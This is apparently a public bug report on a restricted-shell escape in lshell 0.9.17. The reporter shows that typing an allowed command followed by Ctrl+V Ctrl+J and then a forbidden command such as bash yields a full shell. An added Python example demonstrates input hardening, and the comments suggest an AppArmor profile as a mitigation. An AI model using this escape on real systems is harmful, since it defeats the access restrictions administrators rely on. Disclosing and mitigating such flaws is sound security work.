Escape possible using special keys

Bug #1627621 reported by Vladislav Yarmak
This bug affects 1 person
Affects          Status        Importance  Assigned to  Milestone
lshell (Debian)  Fix Released  Unknown
lshell (Ubuntu)  Incomplete    Undecided   Unassigned

Bug Description

Just type <CTRL+V><CTRL+J> after any allowed command and then type the desired restricted command:

vladislav@dt1:~$ getent passwd testuser
testuser:x:1001:1002:,,,:/home/testuser:/usr/bin/lshell
vladislav@dt1:~$ su - testuser
Password:
You are in a limited shell.
Type '?' or 'help' to get the list of allowed commands
testuser:~$ ?
cd clear echo exit help history ll lpath ls lsudo
testuser:~$ bash
*** forbidden command: bash
testuser:~$ echo<CTRL+V><CTRL+J>
bash

testuser@dt1:~$ which bash
/bin/bash
testuser@dt1:~$ ps
  PID TTY TIME CMD
29852 pts/14 00:00:00 lshell
29853 pts/14 00:00:00 sh
29854 pts/14 00:00:00 bash
29864 pts/14 00:00:00 ps

Expected: commands in lshell are restricted
What happened: the user can escape from lshell and execute arbitrary commands

System information:

vladislav@dt1:~$ lsb_release -rd
Description: Ubuntu 16.04.1 LTS
Release: 16.04

vladislav@dt1:~$ apt-cache policy lshell
lshell:
  Установлен: 0.9.17-1
  Кандидат: 0.9.17-1
  Таблица версий:
 *** 0.9.17-1 500
        500 http://ru.archive.ubuntu.com/ubuntu xenial/universe amd64 Packages
        500 http://ru.archive.ubuntu.com/ubuntu xenial/universe i386 Packages
        100 /var/lib/dpkg/status

Bug in upstream issue tracker: https://github.com/ghantoos/lshell/issues/149

ProblemType: Bug
DistroRelease: Ubuntu 16.04
Package: lshell 0.9.17-1
ProcVersionSignature: Ubuntu 4.4.0-38.57-generic 4.4.19
Uname: Linux 4.4.0-38-generic x86_64
NonfreeKernelModules: nvidia_modeset nvidia
ApportVersion: 2.20.1-0ubuntu2.1
Architecture: amd64
CurrentDesktop: XFCE
Date: Mon Sep 26 10:47:40 2016
InstallationDate: Installed on 2016-05-20 (128 days ago)
InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 (20160420.1)
PackageArchitecture: all
SourcePackage: lshell
UpgradeStatus: No upgrade log present (probably fresh install)
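
The following is an added example, not part of the original report and not lshell's own code. It models, as an assumption, an allowlist check that looks only at the first word of the line, and shows a stricter check that rejects any control character (such as the line feed entered with <CTRL+V><CTRL+J>) before the line can reach `sh`. The function names are hypothetical; the allowed list is the one printed by `?` in the session above.

```python
import unicodedata

# Allowed commands as printed by '?' in the reported session.
ALLOWED = {"cd", "clear", "echo", "exit", "help", "history",
           "ll", "lpath", "ls", "lsudo"}

def naive_check(line):
    """Assumed model of the weak check: only the first word is compared."""
    words = line.split()          # split() treats LF like any other whitespace
    return bool(words) and words[0] in ALLOWED

def commands_seen_by_sh(line):
    """Command words sh would run if handed the raw line (LF separation only)."""
    return [part.split()[0] for part in line.split("\n") if part.split()]

def hardened_check(line):
    """Reject every control character (Unicode category Cc: LF, CR, ESC, TAB...)
    before the allowlist is consulted, so the line is always a single line."""
    for pos, ch in enumerate(line):
        if unicodedata.category(ch) == "Cc":
            return False, "control character U+%04X at offset %d" % (ord(ch), pos)
    if not naive_check(line):
        return False, "forbidden command"
    return True, "ok"

if __name__ == "__main__":
    # Constructed inputs: the second one mirrors the keystrokes in the report.
    for sample in ["echo hello", "echo\nbash", "bash"]:
        print(repr(sample),
              "naive:", naive_check(sample),
              "sh runs:", commands_seen_by_sh(sample),
              "hardened:", hardened_check(sample))
```

This covers only the embedded line feed shown in the report; other shell separators need their own handling, and the AppArmor confinement suggested in the comments remains useful as a second layer.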

Vladislav Yarmak (chayt) wrote :
Emily Ratliff (emilyr) wrote :

Thanks for taking the time to report this bug and helping to make Ubuntu better. Since the package referred to in this bug is in universe or multiverse, it is community maintained. If you are able, I suggest coordinating with upstream and posting a debdiff for this issue. When a debdiff is available, members of the security team will review it and publish the package. See the following link for more information: https://wiki.ubuntu.com/SecurityTeam/UpdateProcedures

information type: Private Security → Public Security
Changed in lshell (Ubuntu):
status: New → Incomplete
Changed in lshell (Debian):
status: Unknown → Incomplete
Seth Arnold (seth-arnold) wrote :

Note that most of these 'restricted shells' tend to be .. porous. If you want to use one, it'd be a good idea to wrap it in an AppArmor profile that would provide a belt-and-suspenders approach. e.g., this untested profile would probably solve the issue for you:

/usr/bin/lshell {
  #include <abstractions/base>

  /usr/bin/lshell rmix,
  /usr/lib/python2.7/dist-packages/ r,
  /usr/lib/python2.7/dist-packages/lshell-0.9.17.egg-info r,
  /usr/lib/python2.7/dist-packages/lshell/ r,
  /usr/lib/python2.7/dist-packages/lshell/** r,
  /usr/bin/python2.7 rmix,

  /etc/lshell.conf r,
  /bin/ls rmix,
}

Just add rules for whatever you'd like it to support.

Save it in /etc/apparmor.d/usr.bin.lshell and reload it with sudo systemctl reload apparmor.service. Check dmesg output for DENIED lines and amend as needed.

Thanks

Changed in lshell (Debian):
status: Incomplete → Confirmed
Changed in lshell (Debian):
status: Confirmed → Fix Released